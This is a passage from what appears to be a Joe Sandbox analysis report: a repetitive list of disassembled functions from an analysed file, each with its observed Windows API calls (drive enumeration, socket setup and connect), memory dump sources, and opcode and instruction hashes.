                                                  • Opcode Fuzzy Hash: 66b35416cbbef488e20661e6c8310806df46ec563337d45721a82c82ce395fc4
                                                  • Instruction Fuzzy Hash: 9C518EEB13C221BE722284A62F54AFA6B6DE5C7730B30C426FC07D6502E2F40E4D1131
                                                  Function 072501A7 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 286COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetLogicalDrives.KERNELBASE(?,07240C53), ref: 07250340
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2633385731.0000000007250000.00000040.00001000.00020000.00000000.sdmp, Offset: 07250000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7250000_file.jbxd
                                                  Similarity
                                                  • API ID: DrivesLogical
                                                  • String ID: A:\$A:\
                                                  • API String ID: 999431828-1047444362
                                                  • Opcode ID: d1ac948cdf335c79adba815e7f14bfc6176924dd2c0f5cd69ca20aa74b62db6b
                                                  • Instruction ID: cedf0146214a79713275d254ca20958dfc5ab8303b8c7858935f25f94b0e950e
                                                  • Opcode Fuzzy Hash: d1ac948cdf335c79adba815e7f14bfc6176924dd2c0f5cd69ca20aa74b62db6b
                                                  • Instruction Fuzzy Hash: 5A519DEB13C225BE726285B62F54AFA6B6DE5C7730B308476FC07D6602E2F40E495171
                                                  Function 072501DE Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 277COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetLogicalDrives.KERNELBASE(?,07240C53), ref: 07250340
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2633385731.0000000007250000.00000040.00001000.00020000.00000000.sdmp, Offset: 07250000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7250000_file.jbxd
                                                  Similarity
                                                  • API ID: DrivesLogical
                                                  • String ID: A:\$A:\
                                                  • API String ID: 999431828-1047444362
                                                  • Opcode ID: a9376e83ad0dc34862d0e38a04547c0f35bab0dd1d8df9266d1b6526a7ba1936
                                                  • Instruction ID: 8e0b1ee3cab46761cb0374f8b60983b1c7bfc273ac5fd3b4f6257477dc88d745
                                                  • Opcode Fuzzy Hash: a9376e83ad0dc34862d0e38a04547c0f35bab0dd1d8df9266d1b6526a7ba1936
                                                  • Instruction Fuzzy Hash: 5D51AFEB53C221BE722285B62F549FA6B6DE5CB730B30C466FC07D6642E2F44E491171
                                                  Function 072501F1 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 253COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetLogicalDrives.KERNELBASE(?,07240C53), ref: 07250340
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2633385731.0000000007250000.00000040.00001000.00020000.00000000.sdmp, Offset: 07250000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7250000_file.jbxd
                                                  Similarity
                                                  • API ID: DrivesLogical
                                                  • String ID: A:\$A:\
                                                  • API String ID: 999431828-1047444362
                                                  • Opcode ID: f49dd51c2cc2afef5dfd3e56cdc8d9285d9e59844932bb6b2b41d8b7a37ab95f
                                                  • Instruction ID: cbedfce35b7653ab1e66b25b1a0ca275d5b0e54ad29e7c3fd826128d9865e220
                                                  • Opcode Fuzzy Hash: f49dd51c2cc2afef5dfd3e56cdc8d9285d9e59844932bb6b2b41d8b7a37ab95f
                                                  • Instruction Fuzzy Hash: 9051D2EB13C225BE622285B52F549FA6B6DE9CB730B308476FC07D6642E2F44E4D5131
                                                  Function 07250291 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 251COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetLogicalDrives.KERNELBASE(?,07240C53), ref: 07250340
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2633385731.0000000007250000.00000040.00001000.00020000.00000000.sdmp, Offset: 07250000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7250000_file.jbxd
                                                  Similarity
                                                  • API ID: DrivesLogical
                                                  • String ID: A:\$A:\
                                                  • API String ID: 999431828-1047444362
                                                  • Opcode ID: e3fae4afc0774d14e00da633874c25271ad6704d4dad6b7901524d1f74befb2e
                                                  • Instruction ID: 3b3f043019f459df4dab7c18b83eace40d42932a71ae6500fdb7b15ff2dacf8d
                                                  • Opcode Fuzzy Hash: e3fae4afc0774d14e00da633874c25271ad6704d4dad6b7901524d1f74befb2e
                                                  • Instruction Fuzzy Hash: 9F51D4EB13C221BE662285B52F546FA6B6DE5CB730B308436FC07D6642E2F40E4D5171
                                                  Function 07250205 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 250COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetLogicalDrives.KERNELBASE(?,07240C53), ref: 07250340
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2633385731.0000000007250000.00000040.00001000.00020000.00000000.sdmp, Offset: 07250000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7250000_file.jbxd
                                                  Similarity
                                                  • API ID: DrivesLogical
                                                  • String ID: A:\$A:\
                                                  • API String ID: 999431828-1047444362
                                                  • Opcode ID: 8bba269d03d2aa4c3342f0ed0d68f0233e284f2bc6be8b3ceeba6fb69f5e7eec
                                                  • Instruction ID: f143840a0fb5ca31041eb5148e3cf4f554dc6935e92bf4f5beafff3b33096dd1
                                                  • Opcode Fuzzy Hash: 8bba269d03d2aa4c3342f0ed0d68f0233e284f2bc6be8b3ceeba6fb69f5e7eec
                                                  • Instruction Fuzzy Hash: 8F51E3EB13C221BE326285B62F549FA6A6DE5CB730B308436FC0BD6642E2F40E4D1171
                                                  Function 0725022D Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 248COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetLogicalDrives.KERNELBASE(?,07240C53), ref: 07250340
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2633385731.0000000007250000.00000040.00001000.00020000.00000000.sdmp, Offset: 07250000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7250000_file.jbxd
                                                  Similarity
                                                  • API ID: DrivesLogical
                                                  • String ID: A:\$A:\
                                                  • API String ID: 999431828-1047444362
                                                  • Opcode ID: 70a94c48bf23652a05c58b7e28239b21b882f06e8349b9a3b7818c846ec218d9
                                                  • Instruction ID: 651fd356bdd656b31f5a540dfe84f3359161504e0645604a5670b6d98a89f0b4
                                                  • Opcode Fuzzy Hash: 70a94c48bf23652a05c58b7e28239b21b882f06e8349b9a3b7818c846ec218d9
                                                  • Instruction Fuzzy Hash: 8D41A1EB13C221BE726285B52F546FA6A6DE5CB730B308536FC0BD6642E2F40E491171
                                                  Function 0725020A Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 248COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetLogicalDrives.KERNELBASE(?,07240C53), ref: 07250340
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2633385731.0000000007250000.00000040.00001000.00020000.00000000.sdmp, Offset: 07250000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7250000_file.jbxd
                                                  Similarity
                                                  • API ID: DrivesLogical
                                                  • String ID: A:\$A:\
                                                  • API String ID: 999431828-1047444362
                                                  • Opcode ID: c2d9deabdb258711b62b7d38262f160561424f4c011dcf44ec12cfe34e1b9933
                                                  • Instruction ID: d1c3f93035397371f5246594e70d91b34ee3e45505b27ff9833161b40a7bcedd
                                                  • Opcode Fuzzy Hash: c2d9deabdb258711b62b7d38262f160561424f4c011dcf44ec12cfe34e1b9933
                                                  • Instruction Fuzzy Hash: F651D0EB13C221BE666285B62F549FA6A6DE5CB730B308536FC0BD6642E2F40E491131
                                                  Function 0725023D Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 246COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetLogicalDrives.KERNELBASE(?,07240C53), ref: 07250340
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2633385731.0000000007250000.00000040.00001000.00020000.00000000.sdmp, Offset: 07250000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7250000_file.jbxd
                                                  Similarity
                                                  • API ID: DrivesLogical
                                                  • String ID: A:\$A:\
                                                  • API String ID: 999431828-1047444362
                                                  • Opcode ID: ca71ce748415b436782d070b5348767fbba4d25a979a329bb81ecc1ef90aa2f4
                                                  • Instruction ID: 275680e47b89f30aebd2e5a0f1334f70627fee910b35c9ad11f6d46bcc1896a8
                                                  • Opcode Fuzzy Hash: ca71ce748415b436782d070b5348767fbba4d25a979a329bb81ecc1ef90aa2f4
                                                  • Instruction Fuzzy Hash: 2951E3EB13C221BE722285B52F54AFA6B6EE5C7730B308576FC07D6642E2F40E495131
                                                  Function 0725021D Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 246COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetLogicalDrives.KERNELBASE(?,07240C53), ref: 07250340
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2633385731.0000000007250000.00000040.00001000.00020000.00000000.sdmp, Offset: 07250000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7250000_file.jbxd
                                                  Similarity
                                                  • API ID: DrivesLogical
                                                  • String ID: A:\$A:\
                                                  • API String ID: 999431828-1047444362
                                                  • Opcode ID: ae2ccbb4a1bee8bc3ef22e57cf30c69ce877112920eb1fc5fafd33ae67f424d2
                                                  • Instruction ID: eabe6fb51900c8cc519a73da98e2dfde3d46549bfc1c105274857a74274db63e
                                                  • Opcode Fuzzy Hash: ae2ccbb4a1bee8bc3ef22e57cf30c69ce877112920eb1fc5fafd33ae67f424d2
                                                  • Instruction Fuzzy Hash: 4C51B0EB53C221BE626285B62F549FA6A6EE5CB730B308436FC07D6642E2F40E495131
                                                  Function 0725026C Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 231COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetLogicalDrives.KERNELBASE(?,07240C53), ref: 07250340
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2633385731.0000000007250000.00000040.00001000.00020000.00000000.sdmp, Offset: 07250000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7250000_file.jbxd
                                                  Similarity
                                                  • API ID: DrivesLogical
                                                  • String ID: A:\$A:\
                                                  • API String ID: 999431828-1047444362
                                                  • Opcode ID: 9480cde644f0618f96bb43f6c5baefa0807e2eeba73975c0196a2496496d5fd1
                                                  • Instruction ID: 9ca5b638016d4d1a9b00dc58d9e05445cab46ace3acb5fc878c53243be3d5b93
                                                  • Opcode Fuzzy Hash: 9480cde644f0618f96bb43f6c5baefa0807e2eeba73975c0196a2496496d5fd1
                                                  • Instruction Fuzzy Hash: 9E41A0EB13C221BE726284B62F546FA6A6EE5CB730B308476FC07D6642E2F50E491171
                                                  Function 0056A150 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 80COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • getsockname.WS2_32(?,?,00000080), ref: 0056A1C7
                                                  Strings
                                                  • getsockname() failed with errno %d: %s, xrefs: 0056A1F0
                                                  • ssloc inet_ntop() failed with errno %d: %s, xrefs: 0056A23B
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2630715713.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                                  • Associated: 00000000.00000002.2630696161.0000000000530000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2630715713.0000000000A70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2630715713.0000000000BB4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2630715713.0000000000BD5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2630715713.0000000000BD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631171913.0000000000BDA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000BDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000D63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000E7F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000E84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000F5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000F63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000F72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631484798.0000000000F73000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631607205.0000000001132000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631624604.0000000001134000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                                  Similarity
                                                  • API ID: getsockname
                                                  • String ID: getsockname() failed with errno %d: %s$ssloc inet_ntop() failed with errno %d: %s
                                                  • API String ID: 3358416759-2605427207
                                                  • Opcode ID: 2abd65d80404deb4e820f03132861c521ad161db0e9bc4eb2f37e8f388c61535
                                                  • Instruction ID: fcba80a3ee0a7b0014564460c38c617774e2ca3672147be704ca1cdea5f0554e
                                                  • Opcode Fuzzy Hash: 2abd65d80404deb4e820f03132861c521ad161db0e9bc4eb2f37e8f388c61535
                                                  • Instruction Fuzzy Hash: 8821EA71848680BAF7219B28EC46FE777BCFF91328F040655F99853151FB3269858BE2
                                                  Function 0054D5E0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 46networkCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • WSAStartup.WS2_32(00000202), ref: 0054D65B
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2630715713.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                                  • Associated: 00000000.00000002.2630696161.0000000000530000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2630715713.0000000000A70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2630715713.0000000000BB4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2630715713.0000000000BD5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2630715713.0000000000BD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631171913.0000000000BDA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000BDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000D63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000E7F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000E84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000F5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000F63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000F72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631484798.0000000000F73000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631607205.0000000001132000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631624604.0000000001134000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                                  Similarity
                                                  • API ID: Startup
                                                  • String ID: if_nametoindex$iphlpapi.dll
                                                  • API String ID: 724789610-3097795196
                                                  • Opcode ID: caa9366490054ea4fab7b33e86d773977f4e51a6e5ce74c4eca412975e7ee7d3
                                                  • Instruction ID: bff426adc9c06d890c37a58cb9c1ea94fbe034e0d24d6643432bff55be7fcbbb
                                                  • Opcode Fuzzy Hash: caa9366490054ea4fab7b33e86d773977f4e51a6e5ce74c4eca412975e7ee7d3
                                                  • Instruction Fuzzy Hash: D601FCB0E4138117E711777C5D2B3A669A0BB51308F461969DD44861D7FA29C488C3A2
                                                  Function 005FAA30 Relevance: 4.9, APIs: 3, Instructions: 377networkCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • socket.WS2_32(FFFFFFFF,?,00000000), ref: 005FAB9B
                                                  • ioctlsocket.WS2_32(00000000,8004667E,00000001), ref: 005FABE4
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2630715713.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                                  • Associated: 00000000.00000002.2630696161.0000000000530000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2630715713.0000000000A70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2630715713.0000000000BB4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2630715713.0000000000BD5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2630715713.0000000000BD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631171913.0000000000BDA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000BDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000D63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000E7F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000E84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000F5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000F63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000F72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631484798.0000000000F73000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631607205.0000000001132000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631624604.0000000001134000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                                  Similarity
                                                  • API ID: ioctlsocketsocket
                                                  • String ID:
                                                  • API String ID: 416004797-0
                                                  • Opcode ID: b479ac5888e824aff7dd1208399fe924a3e945ae3fe69bf8408ac735ee6b8d80
                                                  • Instruction ID: 2b741ebb7f09989be4d94ea263761c17f636ca2054567e11f0d5f750f747a77d
                                                  • Opcode Fuzzy Hash: b479ac5888e824aff7dd1208399fe924a3e945ae3fe69bf8408ac735ee6b8d80
                                                  • Instruction Fuzzy Hash: EEE1AFB06043069BEB20CF14C885B7A7BE5FF85310F144A2DFA999B291E779D944CB53
                                                  Function 072502AC Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 218COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetLogicalDrives.KERNELBASE(?,07240C53), ref: 07250340
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2633385731.0000000007250000.00000040.00001000.00020000.00000000.sdmp, Offset: 07250000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7250000_file.jbxd
                                                  Similarity
                                                  • API ID: DrivesLogical
                                                  • String ID: A:\
                                                  • API String ID: 999431828-3379428675
                                                  • Opcode ID: 9900edb52f123d1b8c284866442ea971cd4216ae5de5f060a0400e5aa450a238
                                                  • Instruction ID: 2626d9cbb89268bc2616c1b2bd655d79bf2fcae483e907cedc0a264f954faf88
                                                  • Opcode Fuzzy Hash: 9900edb52f123d1b8c284866442ea971cd4216ae5de5f060a0400e5aa450a238
                                                  • Instruction Fuzzy Hash: 0541B3EB53C221BE722284B52F549FA6A6EE5CB730B30C536FC07D6642E2F44E495131
                                                  Function 072502CB Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 213COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetLogicalDrives.KERNELBASE(?,07240C53), ref: 07250340
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2633385731.0000000007250000.00000040.00001000.00020000.00000000.sdmp, Offset: 07250000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7250000_file.jbxd
                                                  Similarity
                                                  • API ID: DrivesLogical
                                                  • String ID: A:\
                                                  • API String ID: 999431828-3379428675
                                                  • Opcode ID: 1f2dc2a627cf7f8eef37f0f99ba2273c204edd5929e82c011a2803b43d0e789e
                                                  • Instruction ID: 1427cfbcc95fd7ed001a4abec0e8737062afa3f3aefc7859b76418a4739aa9ed
                                                  • Opcode Fuzzy Hash: 1f2dc2a627cf7f8eef37f0f99ba2273c204edd5929e82c011a2803b43d0e789e
                                                  • Instruction Fuzzy Hash: 9341A3EB23D121BE726284B52F546F66B6EE5CB730B308476FC07D6642E6F44E491131
                                                  Function 072502E3 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 204COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetLogicalDrives.KERNELBASE(?,07240C53), ref: 07250340
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2633385731.0000000007250000.00000040.00001000.00020000.00000000.sdmp, Offset: 07250000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7250000_file.jbxd
                                                  Similarity
                                                  • API ID: DrivesLogical
                                                  • String ID: A:\
                                                  • API String ID: 999431828-3379428675
                                                  • Opcode ID: d21fc3278a431e0b6f065d63dbd976cfa2168f8525c3898f330e552b3c5a57f2
                                                  • Instruction ID: 51433307511e58b32e659936c1c392e688774431347adb38d2101583d0096d35
                                                  • Opcode Fuzzy Hash: d21fc3278a431e0b6f065d63dbd976cfa2168f8525c3898f330e552b3c5a57f2
                                                  • Instruction Fuzzy Hash: C44192EB23C221BE726284B52F546F66B6DE5CB730B308476FC07D6642E6F40E491171
                                                  Function 0725030C Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 181COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetLogicalDrives.KERNELBASE(?,07240C53), ref: 07250340
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2633385731.0000000007250000.00000040.00001000.00020000.00000000.sdmp, Offset: 07250000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7250000_file.jbxd
                                                  Similarity
                                                  • API ID: DrivesLogical
                                                  • String ID: A:\
                                                  • API String ID: 999431828-3379428675
                                                  • Opcode ID: 47109a6fc0a94985407284ad7b2f73088ec64473f41a8972b68938c9ac1b4553
                                                  • Instruction ID: 20411e4c47d4c626db82a1dc1ba6e5603e09a9e4f46b64741cec313c6022e961
                                                  • Opcode Fuzzy Hash: 47109a6fc0a94985407284ad7b2f73088ec64473f41a8972b68938c9ac1b4553
                                                  • Instruction Fuzzy Hash: 8231D2EB53C221BE322285B52F54AFA2B6DE9C7730B30C426FC07D6642E6F40E491132
                                                  Function 07250328 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 178COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetLogicalDrives.KERNELBASE(?,07240C53), ref: 07250340
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2633385731.0000000007250000.00000040.00001000.00020000.00000000.sdmp, Offset: 07250000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7250000_file.jbxd
                                                  Similarity
                                                  • API ID: DrivesLogical
                                                  • String ID: A:\
                                                  • API String ID: 999431828-3379428675
                                                  • Opcode ID: b736d96331d2e5951647443faf7751ae262806ff30a5c2eba4c7c0feda67dd39
                                                  • Instruction ID: 6c706ec1c440c706b6c78fd1d889f4bb3ac135a0a807d7c11417b0610da9062c
                                                  • Opcode Fuzzy Hash: b736d96331d2e5951647443faf7751ae262806ff30a5c2eba4c7c0feda67dd39
                                                  • Instruction Fuzzy Hash: 3731B2EB13C221BE326285B52F546F62A6DE5C7730B308536FC07D5642E6F40E491132
                                                  Function 005378B0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 20COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2630715713.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                                  • Associated: 00000000.00000002.2630696161.0000000000530000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2630715713.0000000000A70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2630715713.0000000000BB4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2630715713.0000000000BD5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2630715713.0000000000BD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631171913.0000000000BDA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000BDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000D63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000E7F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000E84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000F5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000F63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000F72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631484798.0000000000F73000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631607205.0000000001132000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631624604.0000000001134000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                                  Similarity
                                                  • API ID: closesocket
                                                  • String ID: FD %s:%d sclose(%d)
                                                  • API String ID: 2781271927-3116021458
                                                  • Opcode ID: 85af25f743639d0814d7d1e66cb818a9db0dd312c2fb28bcfe21816c01acea5b
                                                  • Instruction ID: 5ced40d3695226dee5ade13474d2aae9c6b4653ee264644fc3b1b239afaa7c0f
                                                  • Opcode Fuzzy Hash: 85af25f743639d0814d7d1e66cb818a9db0dd312c2fb28bcfe21816c01acea5b
                                                  • Instruction Fuzzy Hash: D2D05E3790A2256B85316998AC89C5BAFA8BECBF20F064C58F84477204D2209C0183E2
                                                  Function 005FB060 Relevance: 3.0, APIs: 2, Instructions: 48networkCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • connect.WS2_32(-00000028,-00000028,-00000028,-00000001,-00000028,?,-00000028,005FB29E,?,00000000,?,?), ref: 005FB0B9
                                                  • WSAGetLastError.WS2_32(?,?,?,?,?,?,?,?,?,?,00000000,0000000B,?,?,005E3C41,00000000), ref: 005FB0C1
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2630715713.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                                  • Associated: 00000000.00000002.2630696161.0000000000530000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2630715713.0000000000A70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2630715713.0000000000BB4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2630715713.0000000000BD5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2630715713.0000000000BD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631171913.0000000000BDA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000BDC000.00000040.00000001.01000000.00000003.sdmpDownload File
